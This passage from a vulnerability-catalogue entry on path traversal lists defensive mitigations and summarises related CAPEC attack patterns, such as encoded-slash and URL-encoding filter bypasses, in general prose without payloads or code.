Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Mitigation MIT-21.1
Architecture and Design

Strategy: Enforcement by Conversion

  • When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
  • For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability.
Mitigation MIT-22
Architecture and Design Operation

Strategy: Sandbox or Jail

  • Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.
  • OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.
  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-34
Architecture and Design Operation

Strategy: Attack Surface Reduction

  • Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.
  • This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface.
Mitigation MIT-39
Implementation
  • Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.
  • If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.
  • Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.
  • In the context of path traversal, error messages which disclose path information can help attackers craft the appropriate attack strings to move through the file system hierarchy.
Mitigation MIT-16
Operation Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

CAPEC-126: Path Traversal

An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \) and/or dots (.)) to reach desired directories or files.

CAPEC-64: Using Slashes and URL Encoding Combined to Bypass Validation Logic

This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

CAPEC-78: Using Escaped Slashes in Alternate Encoding

This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.

CAPEC-79: Using Slashes in Alternate Encoding

This attack targets the encoding of the Slash characters. An adversary would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the adversary many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.